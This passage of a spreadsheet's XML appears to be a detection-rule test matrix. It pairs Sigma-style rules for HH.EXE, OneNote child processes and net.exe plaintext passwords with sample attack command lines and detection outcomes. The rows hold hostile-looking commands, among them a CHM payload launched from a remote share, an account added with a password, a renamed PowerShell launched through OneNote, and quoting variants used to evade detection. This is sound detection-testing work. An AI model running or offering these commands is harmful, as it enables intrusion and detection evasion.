          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J127" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K127" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="128" ht="15.75" customHeight="1" s="42">
      <c r="A128" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B128" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C128" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D128" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E128" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G128" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H128" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I128" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J128" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K128" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="129" ht="15.75" customHeight="1" s="42">
      <c r="A129" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B129" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C129" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D129" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E129" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G129" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H129" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I129" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J129" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K129" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="130" ht="15.75" customHeight="1" s="42">
      <c r="A130" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B130" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C130" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D130" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E130" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G130" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H130" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I130" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J130" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K130" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="131" ht="15.75" customHeight="1" s="42">
      <c r="A131" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B131" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C131" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D131" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E131" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H131" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I131" s="43" t="n"/>
      <c r="J131" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K131" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="132" ht="15.75" customHeight="1" s="42">
      <c r="A132" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B132" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C132" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D132" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E132" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H132" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I132" s="43" t="n"/>
      <c r="J132" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K132" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="133" ht="15.75" customHeight="1" s="42">
      <c r="A133" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B133" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C133" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D133" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E133" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G133" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H133" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I133" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J133" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K133" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="134" ht="15.75" customHeight="1" s="42">
      <c r="A134" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B134" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C134" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D134" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E134" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G134" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H134" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I134" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J134" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K134" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="135" ht="15.75" customHeight="1" s="42">
      <c r="A135" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B135" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C135" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D135" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E135" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G135" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H135" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I135" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J135" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K135" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="136" ht="15.75" customHeight="1" s="42">
      <c r="A136" s="44" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B136" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C136" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D136" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E136" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G136" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H136" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I136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36" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K136" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="137" ht="15.75" customHeight="1" s="42">
      <c r="A137" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B137" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C137" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D137" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E137" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\malicious.chm</t>
        </is>
      </c>
      <c r="F137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G137" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H137" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I137" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J137" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K137" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="138" ht="15.75" customHeight="1" s="42">
      <c r="A138" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B138" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C138" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D138" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E138" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\help_document.chm</t>
        </is>
      </c>
      <c r="F138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G138" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H138" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I138" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J138" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K138" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="139" ht="15.75" customHeight="1" s="42">
      <c r="A139" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B139" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C139" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D139" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E139" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\Victim\APPDAT~1\Local\Temp\malicious.chm</t>
        </is>
      </c>
      <c r="F139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G139" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H139" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I139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39" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K139" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="140" ht="15.75" customHeight="1" s="42">
      <c r="A140" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B140" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C140" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D140" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E140" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Windows\System32\oobe\msoobe.chm</t>
        </is>
      </c>
      <c r="F140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G140" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H140" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I140" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J140" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K140" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="141" ht="15.75" customHeight="1" s="42">
      <c r="A141" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B141" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C141" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D141" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E141" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\document.chm</t>
        </is>
      </c>
      <c r="F141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G141" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H141" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I141" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J141" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K141" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="142" ht="15.75" customHeight="1" s="42">
      <c r="A142" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B142" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C142" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D142" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E142" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /c cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G142" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H142" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I142" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J142" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K142" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="143" ht="15.75" customHeight="1" s="42">
      <c r="A143" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B143" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C143" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D143" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E143" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /C cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G143" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H143" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I143" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J143" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K143" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="144" ht="15.75" customHeight="1" s="42">
      <c r="A144" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B144" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C144" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D144" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E144" s="44" t="inlineStr">
        <is>
          <t>cmd.exe /"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H144" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I144" s="43" t="n"/>
      <c r="J144" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K144" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="145" ht="15.75" customHeight="1" s="42">
      <c r="A145" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B145" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C145" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D145" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E145" s="44" t="inlineStr">
        <is>
          <t>cmd.exe -"c" cd C:\Users\Public\ &amp;&amp; hh.exe payload.chm</t>
        </is>
      </c>
      <c r="F145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H145" s="44" t="b">
        <v>1</v>
      </c>
      <c r="I145" s="43" t="n"/>
      <c r="J145" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K145" s="44" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="146" ht="15.75" customHeight="1" s="42">
      <c r="A146" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B146" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C146" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D146" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E146" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update_help.chm</t>
        </is>
      </c>
      <c r="F146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G146" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H146" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I146" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J146" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K146" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="147" ht="15.75" customHeight="1" s="42">
      <c r="A147" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B147" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C147" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D147" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E147" s="44" t="inlineStr">
        <is>
          <t>hh.exe \\192.168.1.100\share\payload.chm</t>
        </is>
      </c>
      <c r="F147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G147" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H147" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I147" s="44" t="inlineStr">
        <is>
          <t>Remote CHM File Download/Execution Via HH.EXE (f57c58b3-ee69-4ef5-9041-455bf39aaa89); HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J147" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K147" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="148" ht="15.75" customHeight="1" s="42">
      <c r="A148" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B148" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C148" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D148" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E148" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\ProgramData\update.chm</t>
        </is>
      </c>
      <c r="F148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G148" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H148" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I148" s="44" t="inlineStr">
        <is>
          <t>HH.EXE Execution (68c8acb4-1b60-4890-8e82-3ddf7a6dba84)</t>
        </is>
      </c>
      <c r="J148" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K148" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="149" ht="15.75" customHeight="1" s="42">
      <c r="A149" s="44" t="inlineStr">
        <is>
          <t>t1566.001</t>
        </is>
      </c>
      <c r="B149" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C149" s="44" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D149" s="44" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E149" s="44" t="inlineStr">
        <is>
          <t>hh.exe C:\Users\user\DOWNLO~1\malicious.chm</t>
        </is>
      </c>
      <c r="F149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="G149" s="44" t="b">
        <v>1</v>
      </c>
      <c r="H149" s="44" t="b">
        <v>0</v>
      </c>
      <c r="I149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49" s="44" t="n">
        <v>0</v>
      </c>
      <c r="K149" s="44" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="150" ht="15.75" customHeight="1" s="42">
      <c r="A150" s="8" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B150" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_susp_child_processes</t>
        </is>
      </c>
      <c r="C150" s="9" t="inlineStr">
        <is>
          <t>Suspicious Microsoft OneNote Child Process</t>
        </is>
      </c>
      <c r="D150" s="9" t="inlineStr">
        <is>
          <t>c27515df-97a9-4162-8a60-dc0eeb51b775</t>
        </is>
      </c>
      <c r="E150" s="9" t="inlineStr">
        <is>
          <t>explorer.exe "C:\Users\Public\Documents\payload.lnk"</t>
        </is>
      </c>
      <c r="F150" s="10" t="b">
        <v>0</v>
      </c>
      <c r="G150" s="11" t="b">
        <v>1</v>
      </c>
      <c r="H150" s="12" t="b">
        <v>1</v>
      </c>
      <c r="I150" s="13" t="n"/>
      <c r="J150" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K150" s="12" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="151" ht="15.75" customHeight="1" s="42">
      <c r="A151" s="15" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B151" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C151" s="9" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D151" s="9" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E151" s="9" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /add</t>
        </is>
      </c>
      <c r="F151" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G151" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H151" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I151" s="13" t="n"/>
      <c r="J151" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K151" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="152" ht="15.75" customHeight="1" s="42">
      <c r="A152" s="15" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B152" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C152" s="9" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D152" s="9" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E152" s="9" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\user password123 /add</t>
        </is>
      </c>
      <c r="F152" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G152" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H152" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I152" s="13" t="n"/>
      <c r="J152" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K152" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="153" ht="15.75" customHeight="1" s="42">
      <c r="A153" s="15" t="inlineStr">
        <is>
          <t>t1021.002</t>
        </is>
      </c>
      <c r="B153" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_net_use_password_plaintext</t>
        </is>
      </c>
      <c r="C153" s="9" t="inlineStr">
        <is>
          <t>Password Provided In Command Line Of Net.EXE</t>
        </is>
      </c>
      <c r="D153" s="9" t="inlineStr">
        <is>
          <t>d4498716-1d52-438f-8084-4a603157d131</t>
        </is>
      </c>
      <c r="E153" s="9" t="inlineStr">
        <is>
          <t>"net.exe" user DOMAIN\\user password123 /ADD</t>
        </is>
      </c>
      <c r="F153" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G153" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H153" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I153" s="13" t="n"/>
      <c r="J153" s="14" t="n">
        <v>3</v>
      </c>
      <c r="K153" s="18" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="154" ht="15.75" customHeight="1" s="42">
      <c r="A154" s="8" t="inlineStr">
        <is>
          <t>t1566</t>
        </is>
      </c>
      <c r="B154" s="9" t="inlineStr">
        <is>
          <t>proc_creation_win_office_onenote_susp_child_processes</t>
        </is>
      </c>
      <c r="C154" s="9" t="inlineStr">
        <is>
          <t>Suspicious Microsoft OneNote Child Process</t>
        </is>
      </c>
      <c r="D154" s="9" t="inlineStr">
        <is>
          <t>c27515df-97a9-4162-8a60-dc0eeb51b775</t>
        </is>
      </c>
      <c r="E154" s="9" t="inlineStr">
        <is>
          <t>copy powershell.exe trusted_updater.exe &amp;&amp; "ONENOTE.EXE" /hyperlink trusted_updater.exe</t>
        </is>
      </c>
      <c r="F154" s="16" t="b">
        <v>0</v>
      </c>
      <c r="G154" s="17" t="b">
        <v>0</v>
      </c>
      <c r="H154" s="18" t="b">
        <v>0</v>
      </c>
      <c r="I154" s="13" t="n"/>
      <c r="J154" s="14" t="n">
        <v>3</v>
      </c>
